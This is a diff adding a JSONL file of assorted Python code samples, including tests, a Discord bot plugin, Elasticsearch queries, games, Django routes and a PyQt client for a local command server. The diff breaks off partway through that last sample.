diff --git "a/1712.jsonl" "b/1712.jsonl" new file mode 100644--- /dev/null +++ "b/1712.jsonl" @@ -0,0 +1,669 @@ +{"seq_id":"97765736","text":"inStore = 5\n\nx = int(input(\"How many candies do you want? \"))\n\ni = 1 # start distribution\nwhile i <= x:\n if i > inStore:\n print(\"Ran out of all candies!\")\n break # come out of the loop\n print(\"Here is \" + str(i))\n i += 1\n\nfor i in range(1, 30):\n if i % 3 == 0:\n print(\"NO\")\n continue # skip the remaining statements\n print(i)\n","sub_path":"Introduction/Continue.py","file_name":"Continue.py","file_ext":"py","file_size_in_byte":369,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"96721301","text":"# --------------------------------------------------------------------------------------------\n# Copyright (c) Microsoft Corporation. All rights reserved.\n# Licensed under the MIT License. See License.txt in the project root for license information.\n# --------------------------------------------------------------------------------------------\nimport os\n\nfrom azure.cli.testsdk import (\n ScenarioTest, JMESPathCheck, JMESPathCheckExists\n)\nfrom azure.cli.testsdk.base import execute\nfrom azure.cli.testsdk.preparers import AbstractPreparer\nimport azure.cli.core.azlogging as azlogging\n\nlogger = azlogging.get_az_logger(__name__)\n\n\nclass SelectNoSecClusterPreparer(AbstractPreparer):\n def __init__(self, parameter_name=\"endpoint\",\n endpoint=\"http://127.0.0.1:10550\",\n env_variable_name=\"AZURE_CLI_SF_ENDPOINT\"):\n # Name randomization unnecessary\n super(SelectNoSecClusterPreparer, self).__init__(\"test\", 10)\n self.endpoint = endpoint\n self.parameter_name = parameter_name\n self.env_variable_name = env_variable_name\n\n def create_resource(self, _, **kwargs):\n # Omit name here since there is no randomization required\n endpoint = os.environ.get(self.env_variable_name, self.endpoint)\n logger.debug(\"endpoint %s\", endpoint)\n template = \"az sf cluster select --endpoint {}\"\n execute(template.format(endpoint))\n return {self.parameter_name: endpoint}\n\n\nclass ServiceFabricTests(ScenarioTest):\n\n package_path = \"/media/share/EchoServerApplication3\"\n package_name = \"EchoServerApplication3\"\n application_type_name = \"EchoServerApp\"\n application_type_version = \"3.0\"\n application_name = \"fabric:/app1\"\n application_id = \"app1\"\n\n # Application tests\n\n @SelectNoSecClusterPreparer()\n def sf_test_application_lifecycle(self):\n self.cmd(\"az sf application upload --path {}\".format(\n self.package_path\n ))\n\n self.cmd(\n \"az sf application provision \"\n \"--application-type-build-path {}\".format(\n self.package_name\n )\n )\n\n self.cmd(\n \"az sf application type\",\n checks=[\n JMESPathCheck(\n \"items[0].name\",\n self.application_type_name\n ),\n JMESPathCheck(\n \"items[0].version\",\n self.application_type_version\n )\n ]\n )\n\n self.cmd(\n \"az sf application create \"\n \"--app-type {} --version {} --name {}\".format(\n self.application_type_name,\n self.application_type_version,\n self.application_name\n )\n )\n\n self.cmd(\n \"az sf application list\",\n checks=[\n JMESPathCheck(\"items[0].id\", self.application_id)\n ]\n )\n\n self.cmd(\n \"az sf application health \"\n \"--application-id {}\".format(self.application_id),\n checks=[\n JMESPathCheck(\"name\", self.application_name),\n JMESPathCheckExists(\"aggregatedHealthState\")\n ]\n )\n\n self.cmd(\n \"az sf application delete --application-id {}\".format(\n self.application_id\n )\n )\n\n self.cmd(\n \"az sf application unprovision \"\n \"--application-type-name {} \"\n \"--application-type-version {}\".format(\n self.application_type_name, self.application_type_version\n )\n )\n","sub_path":"src/command_modules/azure-cli-sf/tests/manual_sf_commands.py","file_name":"manual_sf_commands.py","file_ext":"py","file_size_in_byte":3644,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"451499539","text":"import matplotlib.pyplot as plt\n\ndays=int(input(\"How many days do you have?\"))\nno_of_subjects=int(input(\"How many subjects to study?\"))\n\nsubjects={}\ntotal_hours=0\n\nfor i in range(no_of_subjects):\n\tname=input(\" Subject name\")\n\thours=int(input(\"Hours to study\"))\n\tsubjects[name]=hours\n\t\n\ttotal_hours=total_hours+hours\n\ndataset=[]\nxaxis=[]\n\nfor i in range(days+1,0,-1):\n\txaxis.append(str(i))\n\tif i <=2:\n\t\thours = total_hours/i\n\t\tdataset.append(hours)\n\telse:\n\t\thours = total_hours/(i)\n\t\tdataset.append(hours)\n\nif days <= 2 :\n\tstudyhours = total_hours/(days)\n\nelse:\n\tstudyhours = total_hours/(days)\n\t\t\n\thours = int(studyhours)\n\tminutes = float(studyhours*60) % 60\n\n\n\nprint(\"You need to study daily for {} hours {} minutes\".format(hours,float(minutes)))\n\nchoice=int(input(\"Press 1 to show graph\"))\n\nif choice==1:\n\n\tfor i in range(len(xaxis)):\n\t\tx=xaxis[i]\n\t\ty=dataset[i]\n\n\t\tprint(\"If you start on day {}, you need {} hours daily\".format(x,float(y)))\n\n\tplt.plot(xaxis,dataset,color=\"g\")\n\tplt.title('You have to study for:')\n\tplt.xlabel('days')\n\tplt.ylabel('Hours to study')\n\n\tplt.show()\n\n","sub_path":"daily_study_hours_linegraph.py","file_name":"daily_study_hours_linegraph.py","file_ext":"py","file_size_in_byte":1081,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"321368281","text":"from matplotlib import pyplot as plt\nimport z3\nfrom z3 import Real, Optimize, If\nfrom fractions import Fraction\n\n\nEPS = 1e-2\n\n\ndef plotline(ax, b, e, *args):\n ax.plot([b[0], e[0]], [b[1], e[1]], *args)\n\n\ndef add_cond_on_segment(optimizer, b, e, x, y):\n optimizer.add((e[0]-b[0])*(y-b[1])-(e[1]-b[1])*(x-b[0]) == 0)\n optimizer.add(min(b[0], e[0]) <= x)\n optimizer.add(max(b[0], e[0]) >= x)\n optimizer.add(min(b[1], e[1]) <= y)\n optimizer.add(max(b[1], e[1]) >= y)\n\n\ndef add_cond_orthogonal(optimizer, lx, ly, cx, cy, rx, ry):\n optimizer.add((lx-cx)*(rx-cx)+(ly-cy)*(ry-cy) ==0)\n\n\ndef convert_py_type(ratnumtype):\n return float(ratnumtype.as_fraction())\n\n\ndef z3abs(x):\n return If(x >= 0, x, -x)\n\n\ndef search_rectangle(b1, e1, b2, e2, b3, e3, b4, e4):\n x1 = Real('x1')\n x2 = Real('x2')\n x3 = Real('x3')\n x4 = Real('x4')\n\n y1 = Real('y1')\n y2 = Real('y2')\n y3 = Real('y3')\n y4 = Real('y4')\n\n optimizer = Optimize()\n\n add_cond_on_segment(optimizer, b1, e1, x1, y1)\n add_cond_on_segment(optimizer, b2, e2, x2, y2)\n add_cond_on_segment(optimizer, b3, e3, x3, y3)\n add_cond_on_segment(optimizer, b4, e4, x4, y4)\n\n add_cond_orthogonal(optimizer, x1, y1, x2, y2, x3, y3)\n add_cond_orthogonal(optimizer, x2, y2, x3, y3, x4, y4)\n add_cond_orthogonal(optimizer, x3, y3, x4, y4, x1, y1)\n add_cond_orthogonal(optimizer, x4, y4, x1, y1, x2, y2)\n\n # equal_distance\n #optimizer.add_soft((x2-x1)**2+(y2-y1)**2==(x4-x3)**2+(y4-y3)**2)\n #optimizer.add_soft((x3-x2)**2+(y3-y2)**2==(x4-x1)**2+(y4-y1)**2)\n\n #optimizer.maximize(z3abs((x2-x1)*(y4-y1)-(x4-x1)*(y2-y1)))\n\n result = optimizer.check()\n\n print(result)\n fig = plt.figure()\n ax = fig.add_subplot(111)\n plotline(ax, b1, e1)\n plotline(ax, b2, e2)\n plotline(ax, b3, e3)\n plotline(ax, b4, e4)\n\n if result != z3.unsat:\n print(optimizer.model())\n model = optimizer.model()\n x1 = convert_py_type(model[x1])\n x2 = convert_py_type(model[x2])\n x3 = convert_py_type(model[x3])\n x4 = convert_py_type(model[x4])\n y1 = convert_py_type(model[y1])\n y2 = convert_py_type(model[y2])\n y3 = convert_py_type(model[y3])\n y4 = convert_py_type(model[y4])\n\n plotline(ax, [x1, y1], [x2, y2], 'k')\n plotline(ax, [x2, y2], [x3, y3], 'k')\n plotline(ax, [x3, y3], [x4, y4], 'k')\n plotline(ax, [x4, y4], [x1, y1], 'k')\n\n else:\n print('no soltion')\n plt.gca().set_aspect('equal', adjustable='box')\n plt.show()\n\n\ndef getexample1():\n b1 = [1, -1]\n e1 = [-1, 1]\n\n b2 = [-1, 2]\n e2 = [1, 4]\n\n b3 = [2, 4]\n e3 = [4, 2]\n\n b4 = [4, 1]\n e4 = [2, -1]\n search_rectangle(b1, e1, b2, e2, b3, e3, b4, e4)\n\n\ndef getexample2():\n b1 = [-1, 0]\n e1 = [1, 0]\n\n b2 = [-2, 1]\n e2 = [-2, 3]\n\n b3 = [-1, 4]\n e3 = [1, 4]\n\n b4 = [2, 1]\n e4 = [2, 3]\n search_rectangle(b1, e1, b2, e2, b3, e3, b4, e4)\n\n\ndef main():\n getexample2()\nif __name__ == '__main__':\n main()\n","sub_path":"optimizer/geoetryModel/inner_rect.py","file_name":"inner_rect.py","file_ext":"py","file_size_in_byte":3033,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"180766163","text":"from pyramid.response import Response\nfrom pyramid.view import view_config\nimport json\nimport sys\nimport traceback\n\n\ndef format_traceback():\n etype, value, tb = sys.exc_info()\n ret = ''.join(traceback.format_exception(etype, value, tb))\n return '
%s
' % ret\n\n\nERROR_PAGE = \"\"\"\n

An error occured

\n

\n HOME\n


\n

\n%(error)s\n\"\"\"\n\n\n@view_config(context=Exception)\ndef internal_server_error(request):\n tb = format_traceback()\n if not request.is_xhr:\n return Response(ERROR_PAGE % {'error': tb})\n from cone.app.browser.ajax import (\n AjaxContinue,\n AjaxMessage,\n )\n continuation = AjaxContinue([AjaxMessage(tb, 'error', None)]).definitions\n ret = {\n 'mode': 'NONE',\n 'selector': 'NONE',\n 'payload': '',\n 'continuation': continuation,\n }\n response = Response(json.dumps(ret))\n response.content_type = 'application/json'\n return response\n","sub_path":"src/cone/app/browser/exception.py","file_name":"exception.py","file_ext":"py","file_size_in_byte":959,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"447758455","text":"from os import error\nfrom typing import Sized\nfrom sqlalchemy.sql.functions import percent_rank\nfrom elasticsearch import Elasticsearch\nimport numpy as np\nimport pandas as pd\nfrom datetime import datetime\nimport re\n\n\nES_HOST = '192.168.1.7'\nPORT = 9200\n\ndef connect_elasticsearch():\n _es_obj = Elasticsearch(hosts=ES_HOST, port=PORT, timeout=200)\n if _es_obj.ping():\n print('Connect success')\n else:\n print('Not connected!!!')\n return _es_obj\n\n\n\ndef validate_iso8601(str_val):\n is_iso8601 = re.compile('^[0-9]{4}-[0-9]{2}-[0-9]{2}T[0-9]{2}:[0-9]{2}:[0-9]{2}(\\.[0-9]{1,3})?$').match\n try: \n if is_iso8601( str_val ) is not None:\n return True\n except:\n pass\n return False\n\ndef searchall(kwards): \n format_date = ['%d/%m/%Y %H:%M:%S', '%d-%m-%Y %H:%M:%S', '%d-%m-%Y %H%M%S','%d-%m-%Y %H-%M-%S',\\\n '%d%m%Y %H:%M:%S', '%d/%m/%Y %H/%M/%S', '%d/%m/%Y %H%M%S',\\\n '%Y/%m/%d %H:%M:%S','%Y-%m-%d %H:%M:%S','%Y%m%d %H:%M:%S']\n \n _es_obj = connect_elasticsearch()\n field = {}\n #_start = datetime.strptime(kwards['startTime'], '%d/%m/%Y %H:%M:%S').isoformat()\n #_stop = datetime.strptime(kwards['stopTime'], '%d/%m/%Y %H:%M:%S').isoformat()\n _start = None\n _stop = None\n if validate_iso8601(kwards['startTime']):\n _start = kwards['startTime']\n _stop = kwards['stopTime']\n \n else:\n for formater in format_date:\n try:\n datetime.strptime(kwards['startTime'], formater)\n except ValueError as e:\n continue\n else:\n _start = datetime.strptime(kwards['startTime'], formater).isoformat()\n _stop = datetime.strptime(kwards['stopTime'], formater).isoformat() \n \n if not _start or not _stop:\n return f\"{kwards['startTime']} or {kwards['stopTime']} is not reconized\"\n query = {\n \"query\":{\n \"range\":{\n \"startTime\":{\n \"gte\":_start,\n \"lte\":_stop\n }\n }\n }\n }\n \n try:\n data = _es_obj.search(index=kwards['index'],body=query, size=5000)\n except TypeError:\n return pd.DataFrame({})\n else:\n df = query_to_df(data)\n return df\n\n\ndef searchOne(kwards):\n _es_obj = connect_elasticsearch()\n field = {}\n \n format_date = ['%d/%m/%Y %H:%M:%S', '%d-%m-%Y %H:%M:%S', '%d%m%Y %H:%M:%S', \\\n '%Y/%m/%d %H:%M:%S','%Y-%m-%d %H:%M:%S','%Y%m%d %H:%M:%S']\n \n is_iso8601 = re.compile('^[0-9]{4}-[0-9]{2}-[0-9]{2}T[0-9]{2}:[0-9]{2}:[0-9]{2}(\\.[0-9]{1,3})?$').match\n _number = kwards['number']\n \n if validate_iso8601(kwards['startTime']):\n _start = kwards['startTime']\n _stop = kwards['stopTime']\n else:\n for formater in format_date:\n try:\n datetime.strptime(kwards['startTime'], formater)\n except ValueError as e:\n continue\n else:\n _start = datetime.strptime(kwards['startTime'], formater).isoformat()\n \n _stop = datetime.strptime(kwards['stopTime'], formater).isoformat()\n \n query ={\n \"query\": {\n \"bool\": {\n \"must\": [{\n \"term\": {\n \"cust\":_number \n }\n },\n {\n \"range\": {\n \"startTime\": {\n \"gte\": _start,\n \"lt\": _stop\n }\n }\n }\n ]\n }\n }\n }\n try:\n data = _es_obj.search(index=kwards['index'],body=query, size=5000)\n except TypeError:\n return pd.DataFrame({})\n else:\n df = query_to_df(data)\n return df\n\ndef query_to_df(data):\n field = {}\n list_df = []\n for doc in data['hits']['hits']:\n source_data = doc['_source']\n for key, valu in source_data.items():\n try:\n field[key] = np.append(field[key], valu)\n except KeyError as e:\n field[key] = np.array([valu])\n \n df = pd.DataFrame(field)\n df['nBytesUp+nBytesDn'] = df['nBytesUp']+df['nBytesDn']\n print(df['nBytesUp+nBytesDn'])\n return df","sub_path":"backend/src/elasticsearch/elastic.py","file_name":"elastic.py","file_ext":"py","file_size_in_byte":4388,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"167126911","text":"import collections\nimport discord\nfrom plumeria.event import bus\nfrom plumeria.message import ProxyMessage, Response\nfrom plumeria.command import commands, Command, Context, CommandError, Mapping, channel_only\nfrom plumeria.perms import server_admins_only\nfrom plumeria.storage import Session\n\n\nclass AliasManager:\n def __init__(self):\n self.aliases = collections.defaultdict(lambda: {})\n\n def load(self):\n self.aliases.clear()\n session = Session()\n try:\n for row in session.execute(\"SELECT server_id, alias, command FROM alias\").fetchall():\n server_id, alias, command = row\n self.aliases[server_id][alias] = command\n finally:\n session.close()\n\n def create(self, server, alias, command):\n alias = alias.lower()\n session = Session()\n try:\n session.execute(\"REPLACE INTO alias (server_id, alias, command) VALUES (%s, %s, %s)\",\n [server.id, alias, command])\n session.commit()\n finally:\n session.rollback()\n self.aliases[server.id][alias] = command\n\n def delete(self, server, alias):\n alias = alias.lower()\n session = Session()\n try:\n session.execute(\"DELETE FROM alias WHERE server_id = %s AND alias = %s\",\n [server.id, alias])\n session.commit()\n finally:\n session.rollback()\n if alias in self.aliases[server.id]:\n del self.aliases[server.id][alias]\n\n def match_command(self, message, command):\n if command in self.aliases[message.channel.server.id]:\n return self.aliases[message.channel.server.id][command]\n return None\n\n def get_mappings(self, server_id):\n if server_id in self.aliases:\n mappings = []\n for alias, command in self.aliases[server_id].items():\n mappings.append(\n Mapping([alias], Command(None, category=\"(Server-Specific)\", description=command, help=command)))\n return mappings\n else:\n return []\n\n\naliases = AliasManager()\n\n\n@bus.event('init')\nasync def init():\n aliases.load()\n\n\n@commands.register('echo', cost=0.2, category=\"Utility\")\nasync def echo(message):\n \"\"\"\n Simply returns the input string.\n\n Can be used to create an alias::\n\n alias website echo Our website is http://example.com\n \"\"\"\n return Response(message.content)\n\n\n@commands.register('alias', cost=4, category='Alias')\n@channel_only\n@server_admins_only\nasync def alias(message):\n \"\"\"\n Creates a new command alias.\n\n Example::\n\n alias serverinfo a2squery example.com:27015\n\n If commands need to be piped, escape the pipe symbol with a ^::\n\n alias example echo flight simulator ^| drawtext\n \"\"\"\n parts = message.content.split(\" \", 1)\n if len(parts) == 2:\n aliases.create(message.channel.server, parts[0], parts[1])\n await message.respond(\"Created the command alias *{}*.\".format(parts[0]))\n else:\n raise CommandError(\" \")\n\n\n@commands.register('deletealias', cost=4, category='Alias')\n@channel_only\n@server_admins_only\nasync def deletealias(message):\n \"\"\"\n Deletes an alias by name.\n \"\"\"\n if len(message.content):\n aliases.delete(message.channel.server, message.content)\n await message.respond(\"Deleted the command alias *{}*.\".format(message.content))\n else:\n raise CommandError(\"\")\n\n\n@commands.enumerator\nasync def alias_enumerator(server_id):\n if server_id:\n return aliases.get_mappings(server_id)\n else:\n return []\n\n\n@commands.intercept\nasync def alias_listener(message, value, depth):\n if not message.channel.is_private: # public channels only\n value = aliases.match_command(message, value)\n if value:\n message = ProxyMessage(message)\n message.content = value\n return await commands.execute(message, Context(), expect_prefix=False)\n return False\n","sub_path":"plumeria/plugins/alias.py","file_name":"alias.py","file_ext":"py","file_size_in_byte":4070,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"86057008","text":"# -*-coding:utf-8 -*\n\nimport os\n\ndef init_tab():\n\ttab = []\n\tfor l in range(0, 3):\n\t\ttab.append([])\n\t\ttab[l] = [0 for i in range(0, 3)]\n\treturn tab\n\ndef ft_get_val_tab(tab):\n\tls = [0,0,0,0,0,0,0,0]\n\tfor x in range(0, 3):\n\t\tfor y in range(0, 3):\n\t\t\tls[x] += tab[x][y]\n\t\t\tls[x+3] += tab[y][x]\n\t\tls[6] += tab[x][x]\n\t\tls[7] += tab[2-x][x]\n\treturn ls\n\ndef ft_game_is_over(tab, nb_tour):\n\tcount1 = 0\n\tcount2 = 0\n\tif nb_tour > 4:\n\t\tval = ft_get_val_tab(tab)\n\t\tfor i, nb in enumerate(val):\n\t\t\tcount1 += nb - 1 if nb > 1 else 0\n\t\t\tcount2 += (-nb) - 1 if nb < -1 else 0\n\t\tprint(count1, count2, nb_tour)\n\t\tif count1 > 1:\n\t\t\treturn 1\n\t\tif count2 > 1:\n\t\t\treturn 2\n\t\tif nb_tour > 7:\n\t\t\treturn -1\n\treturn 0\n\ndef get_input_pos():\n\tpos = [-1,-1]\n\tfor i,entier in enumerate(pos):\n\t\terror = 1\n\t\twhile error == 1:\n\t\t\terror = 0\n\t\t\tr = input(\"entrer la {} sur laquel vous-voulez jouer\\n>>>\"\\\n\t\t\t\t.format(\"ligne\" if i == 0 else \"colonne\"))\n\t\t\ttry:\n\t\t\t\tpos[i] = int(r)\n\t\t\t\tif pos[i] < 1 or pos[i] > 3:\n\t\t\t\t\traise ValueError(\"le nb de la {} doit etre compris entre 1 et 3\"\\\n\t\t\t\t\t\t.format(\"ligne\" if i == 0 else \"colonne\"))\n\t\t\texcept Exception as e:\n\t\t\t\tprint(e)\n\t\t\t\terror = 1\n\treturn pos[0] - 1, pos[1] - 1\n\ndef ft_get_pos(tab):\n\tfree = 0\n\twhile free != 1:\n\t\tx, y = get_input_pos()\n\t\tif tab[x][y] != 0:\n\t\t\tprint(\"les coordonnée {} sont dejas prise.\\nVellez les re-saisir\"\\\n\t\t\t\t.format((x + 1, y + 1)))\n\t\telse:\n\t\t\tfree = 1\n\treturn x, y\n\ndef ft_place_coor(tab, pos, joueur1):\n\tx, y = pos\n\ttab[x][y] = 1 if joueur1 == True else -1\n\ndef ft_dysplay_tab(tab):\n\tsrc = \"\"\n\tfor i,line in enumerate(tab):\n\t\tsrc += \" - - -\\n|\"\n\t\tfor y, nb in enumerate(line):\n\t\t\tif nb == 0:\n\t\t\t\tsrc += \" |\"\n\t\t\telse :\n\t\t\t\tsrc += (\"X\" if nb == 1 else \"O\") + \"|\"\n\t\tsrc += \"\\n\"\n\tsrc += \" - - -\\n\"\n\tprint(src)\n\ndef main():\n\ttab = init_tab()\n\tjoueur1 = False\n\tgame = 0\n\tnb_tour = 0\n\twhile game == 0:\n\t\tnb_tour += 1\n\t\tjoueur1 = False if joueur1 == True else True\n\t\tprint(\"au tour du joueur {} de jouer\".format(1 if joueur1 == True else 2))\n\t\tft_dysplay_tab(tab)\n\t\tx, y = ft_get_pos(tab)\n\t\tft_place_coor(tab, (x, y), joueur1)\n\t\tgame = ft_game_is_over(tab, nb_tour)\n\tif game < 0:\n\t\tprint(\"égalité\")\n\telse:\n\t\tprint(\"le jouer {} à gagne\".format(game))\n\tos.system(\"pause\")\n\nif __name__ == '__main__':\n\tmain()","sub_path":"projet/morpion/morpion.py","file_name":"morpion.py","file_ext":"py","file_size_in_byte":2246,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"466434564","text":"\"\"\"primer_proyecto_django URL Configuration\n\nThe `urlpatterns` list routes URLs to views. For more information please see:\n https://docs.djangoproject.com/en/3.2/topics/http/urls/\nExamples:\nFunction views\n 1. Add an import: from my_app import views\n 2. Add a URL to urlpatterns: path('', views.home, name='home')\nClass-based views\n 1. Add an import: from other_app.views import Home\n 2. Add a URL to urlpatterns: path('', Home.as_view(), name='home')\nIncluding another URLconf\n 1. Import the include() function: from django.urls import include, path\n 2. Add a URL to urlpatterns: path('blog/', include('blog.urls'))\n\"\"\"\nfrom django.urls import path\nfrom . import views\n\nurlpatterns = [\n path('', views.root, name='index'),\n path(\"blogs\", views.index, name=\"blogs\"),\n path(\"blogs/new\", views.new, name=\"new\"),\n path(\"blogs/create\", views.create, name=\"create\"),\n path(\"blogs/\", views.show, name=\"show\"),\n path(\"blogs//edit\", views.edit, name=\"edit\"),\n path(\"blogs//delete\", views.destroy, name=\"delete\"),\n path(\"blogs/json\", views.json, name=\"json\"),\n\n]\n","sub_path":"core/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1142,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"457262966","text":"import time\nimport datetime\nimport json\n\n\nclass DBObject(object):\n \"\"\"This class defines how objects in the mongoDB should be represented.\"\"\"\n\n def __init__(\n self,\n classes=[],\n type='',\n meta={}\n ):\n self.created = datetime.datetime.now()\n self.updated = datetime.datetime.now()\n self.classes = classes\n self.type = type\n self.meta = meta\n self.structure = '{}{}'.format('#', self.__class__.__name__)\n\n\n def export(self):\n \"\"\"This function exports the object as a dict. This is used when\n putting an object in the database.\"\"\"\n\n return self.__dict__\n\nclass Media(DBObject):\n def __init__(\n self,\n path=None,\n *args,\n **kwargs\n ):\n DBObject.__init__(self, *args, **kwargs)\n self.path = path\n\nclass Option(DBObject):\n def __init__(\n self,\n key=None,\n value=None,\n *args,\n **kwargs\n ):\n DBObject.__init__(self, *args, **kwargs)\n self.key = key\n self.value = value\n\nclass User(DBObject):\n def __init__(\n self,\n username=None,\n email=None,\n password=None,\n media_id=None,\n description=None,\n *args,\n **kwargs\n ):\n DBObject.__init__(self, *args, **kwargs)\n self.username = username\n self.email = email\n self.password = password\n self.media_id = media_id\n self.description = description\n\nclass Location(DBObject):\n def __init__(\n self,\n city=None,\n name=None,\n *args,\n **kwargs\n ):\n DBObject.__init__(self, *args, **kwargs)\n self.city = city\n self.name = name\n\nclass Event(DBObject):\n def __init__(\n self,\n user_id=None,\n location_id=None,\n users=None,\n max_users=1,\n hour=None,\n minute=None,\n *args,\n **kwargs\n ):\n DBObject.__init__(self, *args, **kwargs)\n self.user_id = user_id\n self.location_id = location_id\n self.users = users\n self.max_users = max_users\n self.hour = hour\n self.minute = minute\n","sub_path":"meetndrink/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":2381,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"415753339","text":"import logging\nimport ujson\nfrom uuid import UUID\n\nfrom django.http import HttpRequest, HttpResponse, HttpResponseBadRequest, HttpResponseNotFound\n\n# Create your views here.\nfrom gameapi.games_manager import DoesNotExist, game_manager\nfrom gameapi.models import Game, Token, Card\n\nlogger = logging.getLogger(__name__)\n\n\ndef game_auth(fn):\n def game_auth_wrapper(request, game_id, *args, **kwargs):\n try:\n game = check_game_id(game_id)\n except DoesNotExist:\n return HttpResponseNotFound('Game does not exist')\n try:\n token_str = request.GET['token']\n except KeyError:\n return HttpResponseBadRequest('No token provided')\n try:\n token = check_token_exists(token_str)\n except Token.DoesNotExist:\n return HttpResponseBadRequest('Token invalid')\n\n if not check_token_in_game(game, token.token):\n logger.warning('Token is not part of this game. (%s not in %s)', token, game.players)\n return HttpResponseBadRequest('Token is not part of this game.')\n return fn(request, *args, game=game, token=token, **kwargs)\n\n return game_auth_wrapper\n\n\ndef check_game_id(game_id: UUID):\n return game_manager.get_game(game_id)\n\n\ndef check_token_exists(token: str):\n return Token.objects.get(token=token)\n\n\ndef check_token_in_game(game: Game, token: Token):\n return token in game.players\n\n\n@game_auth\ndef get_state(request: HttpRequest, game: Game, token: Token):\n logger.debug('/get_state handler')\n state = game.get_state(token.token)\n logger.debug(state)\n return HttpResponse(\n content=ujson.dumps(state),\n )\n\n\n@game_auth\ndef take_action(request: HttpRequest, game: Game, token: Token):\n logger.debug('/take_action handler')\n if 'action' not in request.GET:\n return HttpResponseBadRequest('No action provided')\n action_str = request.GET['action']\n card_str = request.GET.get(key='card', default=None)\n\n uuid = token.token\n action = Game.Action(action_str)\n card = Card.from_string(card_str) if card_str else None\n action_accepted = True\n try:\n game.take_action(uuid, action, card)\n except Game.ActionNotAllowed:\n logger.warning(\n 'Action not allowed %s %s',\n action, token,\n )\n action_accepted = False\n except Game.ActionInvalid:\n logger.warning(\n 'Action invalid %s %s',\n action, token,\n )\n action_accepted = False\n\n new_state = game.get_state(uuid)\n new_state.update({\n 'action_accepted': action_accepted,\n })\n logger.debug(new_state)\n return HttpResponse(content=ujson.dumps(new_state))\n","sub_path":"gameserver/gameapi/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2707,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"494392049","text":"import re\nimport os\n\n\ndef unformat(test_string, format_string):\n x = re.search('^' + format_string.format('(.*)') + '$', test_string,flags=re.DOTALL)\n return None if x is None else x.group(1)\n\ndef clear():\n os.system('cls' if os.name == 'nt' else 'clear')\n\nclass _Getch:\n \"\"\"\n Gets a single character from standard input. \n \n Does not echo to the screen.\n \"\"\"\n\n def __init__(self):\n try:\n self.impl = _GetchWindows()\n except ImportError:\n self.impl = _GetchUnix()\n\n def __call__(self): \n char = self.impl()\n if char == '\\x03':\n raise KeyboardInterrupt\n elif char == '\\x04':\n raise EOFError\n return char\n\n\n\nclass _GetchUnix:\n def __init__(self):\n import tty, sys\n\n def __call__(self):\n import sys, tty, termios\n fd = sys.stdin.fileno()\n old_settings = termios.tcgetattr(fd)\n try:\n tty.setraw(sys.stdin.fileno())\n ch = sys.stdin.read(1)\n finally:\n termios.tcsetattr(fd, termios.TCSADRAIN, old_settings)\n return ch\n\n\nclass _GetchWindows:\n def __init__(self):\n import msvcrt\n\n def __call__(self):\n import msvcrt\n return msvcrt.getch()\n\ngetch = _Getch()\n","sub_path":"utilities.py","file_name":"utilities.py","file_ext":"py","file_size_in_byte":1281,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"488837108","text":"import os\r\nfrom Games import TicTacToe\r\nfrom File_storage import *\r\n\r\nEPSILON = 0.1\r\nSANITY_CHECK = True\r\ncwd = os.getcwd()\r\ncwd = cwd + '\\\\tensorflow_logs'\r\n\r\ndef init():\r\n # create game\r\n global game\r\n game = TicTacToe()\r\n\r\n # initialize Monte Carlo tree\r\n global mct\r\n mct = load_mct()\r\n if mct == []:\r\n mct.append(Node(game))\r\n \r\n","sub_path":"const.py","file_name":"const.py","file_ext":"py","file_size_in_byte":365,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"610274554","text":"import sys\nfrom PyQt4 import QtGui, QtCore\nfrom PyQt4.QtGui import *\nimport socket\n\n\nclass Window(QtGui.QMainWindow):\n\n\tdef __init__(self):\n\t\tsuper(Window, self).__init__()\n\t\tself.setGeometry(50, 50, 100, 115)\n\t\tself.setWindowTitle(\"Command server!\")\n\t\tself.setWindowIcon(QtGui.QIcon('pythonlogo.png'))\n\n\n\t\tself.my_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n\t\tself.my_socket.connect(('127.0.0.1', 1729))\n\n\t\textractAction = QtGui.QAction(\"&Exit the app\", self)\n\t\textractAction.setShortcut(\"Ctrl+Q\")\n\t\textractAction.setStatusTip('Leave The App')\n\t\textractAction.triggered.connect(self.close_application)\n\n\t\tself.home()\n\n\tdef home(self):\n\t\tbtn = QtGui.QPushButton(\"Quit\", self)\n\t\tbtn.clicked.connect(self.close_application)\n\t\tbtn.resize(btn.minimumSizeHint())\n\t\tbtn.move(0, 80)\n\n\t\tprintScrnAction = QtGui.QAction(QtGui.QIcon('images/camera.png'), 'Print the screen', self)\n\t\tprintScrnAction.triggered.connect(self.print_screen)\n\t\tself.toolBar = self.addToolBar(\"Take a screencap\")\n\t\tself.toolBar.addAction(printScrnAction)\n\n\t\tdirAction = QtGui.QAction(QtGui.QIcon('images/folder.png'), 'Print contents of directory', self)\n\t\tdirAction.triggered.connect(self.directory)\n\t\tself.toolBar = self.addToolBar(\"Print contents of directory\")\n\t\tself.toolBar.addAction(dirAction)\n\n\t\tdeleteAction = QtGui.QAction(QtGui.QIcon('images/delete.png'), 'Deletes a file', self)\n\t\tdeleteAction.triggered.connect(self.delete)\n\t\tself.toolBar = self.addToolBar(\"Delete a file\")\n\t\tself.toolBar.addAction(deleteAction)\n\n\t\tcopyAction = QtGui.QAction(QtGui.QIcon('images/copy.png'), 